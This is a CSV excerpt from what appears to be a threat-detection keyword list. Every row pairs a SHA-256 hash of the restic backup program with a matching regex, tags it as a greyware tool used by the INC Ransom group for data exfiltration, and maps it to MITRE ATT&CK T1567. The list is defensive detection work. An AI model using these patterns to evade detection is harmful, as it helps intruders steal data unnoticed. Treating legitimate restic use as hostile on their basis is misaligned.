"*32273bc91ff97d985a6a1e97037b9e3814f87db6b1751201e94594ee49bdb808*",".{0,1000}32273bc91ff97d985a6a1e97037b9e3814f87db6b1751201e94594ee49bdb808.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*327426b8391497fc97c5d0fd0ccc9107cb3e2c2c2c25c5c8d3d7bf138ebfebe8*",".{0,1000}327426b8391497fc97c5d0fd0ccc9107cb3e2c2c2c25c5c8d3d7bf138ebfebe8.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*328dac26bf8b47c20c4525f0c4c21f17857c1606355dc42362d37be5d3d4c95b*",".{0,1000}328dac26bf8b47c20c4525f0c4c21f17857c1606355dc42362d37be5d3d4c95b.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*32de5f522092e4dd545d064e7bc2db58244200af33559bc7190d18c93edbc397*",".{0,1000}32de5f522092e4dd545d064e7bc2db58244200af33559bc7190d18c93edbc397.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*3365e35e064a5dc3720c596dbc64c56f8cf6d079b30085f2ff7a148e7ebc6e55*",".{0,1000}3365e35e064a5dc3720c596dbc64c56f8cf6d079b30085f2ff7a148e7ebc6e55.{0,1000}","greyware_tool_keyword","restic","backup program used by threat 
actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*349eb981d2d5b1f4b16127d6a0c07929ff6851d15f816a9d09ff71154743a9e1*",".{0,1000}349eb981d2d5b1f4b16127d6a0c07929ff6851d15f816a9d09ff71154743a9e1.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*34f4d439f01d02cf9b4d3f840375af6f2ef130e70730cf45f3989f9349c65326*",".{0,1000}34f4d439f01d02cf9b4d3f840375af6f2ef130e70730cf45f3989f9349c65326.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*35396671b32a78b457168a6413a2e0c7818e8ae740905eb273c0198f051e930f*",".{0,1000}35396671b32a78b457168a6413a2e0c7818e8ae740905eb273c0198f051e930f.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*359d3b8e555a9952f2b98c81ee3dbec8dc441e12789c436ca564762aaacec095*",".{0,1000}359d3b8e555a9952f2b98c81ee3dbec8dc441e12789c436ca564762aaacec095.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data 
Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*35e6e7e783afa5c5397acfde3b9237a5b1ace0cf4d0d3bf3f2d77ff601cd5157*",".{0,1000}35e6e7e783afa5c5397acfde3b9237a5b1ace0cf4d0d3bf3f2d77ff601cd5157.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*3631e3c3833c84ba71f22ea3df20381676abc7476a7f6d14424d9abfada91414*",".{0,1000}3631e3c3833c84ba71f22ea3df20381676abc7476a7f6d14424d9abfada91414.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*36b87e150926457e25e95098f2f386f63f43c2aee5d30275582e6ba044de4003*",".{0,1000}36b87e150926457e25e95098f2f386f63f43c2aee5d30275582e6ba044de4003.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*370485cb64eca360249e7232e2b0400a5d1d0c937f91e8bcc7b1d545eb23a162*",".{0,1000}370485cb64eca360249e7232e2b0400a5d1d0c937f91e8bcc7b1d545eb23a162.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" 
"*37dbd859160bbb6d1b95e9f4a5c498c8df386db510950875c70328f688cb4e5d*",".{0,1000}37dbd859160bbb6d1b95e9f4a5c498c8df386db510950875c70328f688cb4e5d.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*38022b590f11207be34e2eb14ab67b85774ee27d3f9903460173f1d1b77db6de*",".{0,1000}38022b590f11207be34e2eb14ab67b85774ee27d3f9903460173f1d1b77db6de.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*391432015104d8987eb9bce325017b71f6343d8ca970c94b81374aca7aa5035f*",".{0,1000}391432015104d8987eb9bce325017b71f6343d8ca970c94b81374aca7aa5035f.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*394a6568c9b0e5de222256451e18de4e5b9379b058cb9fb3b04ae66c45354e16*",".{0,1000}394a6568c9b0e5de222256451e18de4e5b9379b058cb9fb3b04ae66c45354e16.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*3990b68a8b0de116612ecfe7b85690659aad1ef779c606b0b6d928c402f3d821*",".{0,1000}3990b68a8b0de116612ecfe7b85690659aad1ef779c606b0b6d928c402f3d821.{0,1000}","greyware_tool_keyword","restic","backup program used by threat 
actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*39b615a36a5082209a049cce188f0654c6435f0bc4178b7663672334594f10fe*",".{0,1000}39b615a36a5082209a049cce188f0654c6435f0bc4178b7663672334594f10fe.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*3a379eedcb90ad0ec60a24c89f9892eb7a12ddb8a28045e432fc2c43e7faa186*",".{0,1000}3a379eedcb90ad0ec60a24c89f9892eb7a12ddb8a28045e432fc2c43e7faa186.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*3a7686526b309fdfe287a88e49efb56bc9dfe5c5e02e78b4f09a942cfb2de7d0*",".{0,1000}3a7686526b309fdfe287a88e49efb56bc9dfe5c5e02e78b4f09a942cfb2de7d0.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*3b5f8f9ea98033c46c65edd222a676b5844186114ada1d91a56c58b0abcd0612*",".{0,1000}3b5f8f9ea98033c46c65edd222a676b5844186114ada1d91a56c58b0abcd0612.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data 
Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*3c63b475a56cfb3569784a78f7e712843d096779fa5b1984bdef0cebb2c31437*",".{0,1000}3c63b475a56cfb3569784a78f7e712843d096779fa5b1984bdef0cebb2c31437.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*3c748064aa6d61727905c9ecd3be96b282448ae9c13368f836834ab0b49ad6e1*",".{0,1000}3c748064aa6d61727905c9ecd3be96b282448ae9c13368f836834ab0b49ad6e1.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*3c7522dd19a1d8341e33c910afe1a84d8b9dda03de6d2cddbfb145f401e56a33*",".{0,1000}3c7522dd19a1d8341e33c910afe1a84d8b9dda03de6d2cddbfb145f401e56a33.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*3c882962fc07f611a6147ada99c9909770d3e519210fd483cde9609c6bdd900c*",".{0,1000}3c882962fc07f611a6147ada99c9909770d3e519210fd483cde9609c6bdd900c.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" 
"*3cc1f7c3389f4f9d9f67dc0c0bf9a12d1ef413edc6b3c770f5faa5cd6e275dfe*",".{0,1000}3cc1f7c3389f4f9d9f67dc0c0bf9a12d1ef413edc6b3c770f5faa5cd6e275dfe.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*3d4d43c169a9e28ea76303b1e8b810f0dcede7478555fdaa8959971ad499e324*",".{0,1000}3d4d43c169a9e28ea76303b1e8b810f0dcede7478555fdaa8959971ad499e324.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*3e8a768889dd85d952fc7160d196c68866c9155383b0347c4049d079c8ae2cdd*",".{0,1000}3e8a768889dd85d952fc7160d196c68866c9155383b0347c4049d079c8ae2cdd.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*3e9460a86fa16e9273c3a09f4cefccfd6e9a27ece4836fe2c3409593ba24c21f*",".{0,1000}3e9460a86fa16e9273c3a09f4cefccfd6e9a27ece4836fe2c3409593ba24c21f.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*3f01015707ba586af211445b24c078088e888e1d496776d2290c85ced4c0fc8d*",".{0,1000}3f01015707ba586af211445b24c078088e888e1d496776d2290c85ced4c0fc8d.{0,1000}","greyware_tool_keyword","restic","backup program used by threat 
actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*3f031af58b8b614eafe0fbefb338542b7b04f878853fa9f62394a00923375735*",".{0,1000}3f031af58b8b614eafe0fbefb338542b7b04f878853fa9f62394a00923375735.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*3f3ebac013334cb9fd5d1f4556c67ed3e663338b72b48dce0ec0ee774690a8c5*",".{0,1000}3f3ebac013334cb9fd5d1f4556c67ed3e663338b72b48dce0ec0ee774690a8c5.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*3fe6bb27a84dc5b565f2a31d2297497df75af2da88390e0b893ef90cae605a23*",".{0,1000}3fe6bb27a84dc5b565f2a31d2297497df75af2da88390e0b893ef90cae605a23.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*3fee12f2bf405e28cc35e8fe8379d9d73345a79ee8347f4928701158495bb266*",".{0,1000}3fee12f2bf405e28cc35e8fe8379d9d73345a79ee8347f4928701158495bb266.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data 
Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*40862cc6300a8460151fc4adda2d95bfc405f581919c0732ef654cf22a99584f*",".{0,1000}40862cc6300a8460151fc4adda2d95bfc405f581919c0732ef654cf22a99584f.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*40d9fe8c9f191ab5d0f3e172eadac4fb3aef7a698b895a22ce81102b0a0f270a*",".{0,1000}40d9fe8c9f191ab5d0f3e172eadac4fb3aef7a698b895a22ce81102b0a0f270a.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*411e557dd4765d49299e45c2c6700f436da20c1e455dffa36406bd841b5863c9*",".{0,1000}411e557dd4765d49299e45c2c6700f436da20c1e455dffa36406bd841b5863c9.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*41cc6ad3ac5e99ee088011f628fafcb4fa1e4d3846be2333e5c2a3f6143cd0c1*",".{0,1000}41cc6ad3ac5e99ee088011f628fafcb4fa1e4d3846be2333e5c2a3f6143cd0c1.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" 
"*41d0b1d19e7427cca350e9079cd4c52145d6c1bc4c9f89d1b9b7328ceeaa9d26*",".{0,1000}41d0b1d19e7427cca350e9079cd4c52145d6c1bc4c9f89d1b9b7328ceeaa9d26.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*41d47f100f61c503c462f53069e5c2aaad4dafec461e56b85b1de7730e4f9c4d*",".{0,1000}41d47f100f61c503c462f53069e5c2aaad4dafec461e56b85b1de7730e4f9c4d.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*41dcb500cafd238bee5efab4de53eaca0c22bb5d504c4ef5e2672b91c341c5e4*",".{0,1000}41dcb500cafd238bee5efab4de53eaca0c22bb5d504c4ef5e2672b91c341c5e4.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*421df18208f862250939213750c7573b4880fc0583a46d757e039e615bc60877*",".{0,1000}421df18208f862250939213750c7573b4880fc0583a46d757e039e615bc60877.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*4231518d2e5ed5fa9f486f6259367e6cf82e850b19842e8c4f801bba4ed781be*",".{0,1000}4231518d2e5ed5fa9f486f6259367e6cf82e850b19842e8c4f801bba4ed781be.{0,1000}","greyware_tool_keyword","restic","backup program used by threat 
actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*4241fd63136c5f19a197d232b8be95e88b06dd9d2052c950404dd6567d922ab7*",".{0,1000}4241fd63136c5f19a197d232b8be95e88b06dd9d2052c950404dd6567d922ab7.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*4255a5579488169942100c59340c13cd7c7918ee2ef75efee8f237a7996f2c7f*",".{0,1000}4255a5579488169942100c59340c13cd7c7918ee2ef75efee8f237a7996f2c7f.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*42697577979dbc80eb0f7506f4e515fcb22ef731e4199c33d98c450ed73967ac*",".{0,1000}42697577979dbc80eb0f7506f4e515fcb22ef731e4199c33d98c450ed73967ac.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*426eb5437d5f204ca5788afd05e3f8e5ead876235bb6182b06a03c353bdaf8c7*",".{0,1000}426eb5437d5f204ca5788afd05e3f8e5ead876235bb6182b06a03c353bdaf8c7.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data 
Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*42a758228141c7215bd913352516e8ab1e02c9f786e1f4076f7c1d245e9815b0*",".{0,1000}42a758228141c7215bd913352516e8ab1e02c9f786e1f4076f7c1d245e9815b0.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*42ab238bd96334665442e896141ba5e9aca31b2a27d672f7a6f111be1f825611*",".{0,1000}42ab238bd96334665442e896141ba5e9aca31b2a27d672f7a6f111be1f825611.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*434d77b8079a27f303d30758ad99152abf3102095b6bb3573c1de307f1ab6345*",".{0,1000}434d77b8079a27f303d30758ad99152abf3102095b6bb3573c1de307f1ab6345.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*43836fc05af4c552cb500cdc87a6ca06a6fb0f6b8f179171f1a971aee0a4d6f7*",".{0,1000}43836fc05af4c552cb500cdc87a6ca06a6fb0f6b8f179171f1a971aee0a4d6f7.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" 
"*43f13d70c3f9912a1ff1eac831c2c728b3864b332974fb57b0a33a4bba85487c*",".{0,1000}43f13d70c3f9912a1ff1eac831c2c728b3864b332974fb57b0a33a4bba85487c.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*44ce3367b0b413ad48757de8e2a1f4e2c30137e7cdc77db64906f3eb7087b78f*",".{0,1000}44ce3367b0b413ad48757de8e2a1f4e2c30137e7cdc77db64906f3eb7087b78f.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*452b0b0626412b439f83ad72cce7f280434fc690f4b4851417a759fc4d60392b*",".{0,1000}452b0b0626412b439f83ad72cce7f280434fc690f4b4851417a759fc4d60392b.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*457676a918bae4371b312fcf6308578078d5c944758ff808307d9b416a98f68f*",".{0,1000}457676a918bae4371b312fcf6308578078d5c944758ff808307d9b416a98f68f.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*459f93b1384a4a734787f259252959e88baaea1cb7b790a4f1779c4163efb1ed*",".{0,1000}459f93b1384a4a734787f259252959e88baaea1cb7b790a4f1779c4163efb1ed.{0,1000}","greyware_tool_keyword","restic","backup program used by threat 
actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*466ccb2dcccfff96a199d4f84c05a0e80e932ba44d0f4de4b851f1b8180a7a4c*",".{0,1000}466ccb2dcccfff96a199d4f84c05a0e80e932ba44d0f4de4b851f1b8180a7a4c.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*46d932ff5e5ca781fb01d313a56cf4087f27250fbdc0d7cb56fa958476bb8af8*",".{0,1000}46d932ff5e5ca781fb01d313a56cf4087f27250fbdc0d7cb56fa958476bb8af8.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*46e430adf1e95bd73f253c42f270b1e2b209457cad4e45edae59ff6e87a27069*",".{0,1000}46e430adf1e95bd73f253c42f270b1e2b209457cad4e45edae59ff6e87a27069.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*4743ea0bcead6c3d7e8444711f627c0ee495cb651d3490960ec8b6fb742ae9db*",".{0,1000}4743ea0bcead6c3d7e8444711f627c0ee495cb651d3490960ec8b6fb742ae9db.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data 
Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*47740183a3e2ffdb4acc17a97456de9406f158ec4c964d9d6627fd6711032a86*",".{0,1000}47740183a3e2ffdb4acc17a97456de9406f158ec4c964d9d6627fd6711032a86.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*47ab8cf4c8a99b270634aae6b5bdbf49ba75aedc09ca04e0fd43a7be9108c27a*",".{0,1000}47ab8cf4c8a99b270634aae6b5bdbf49ba75aedc09ca04e0fd43a7be9108c27a.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*47c3345b1bb58e7f984c41831bbc845f1c61a6add5cbf5b3a52a691c78e83c9a*",".{0,1000}47c3345b1bb58e7f984c41831bbc845f1c61a6add5cbf5b3a52a691c78e83c9a.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" 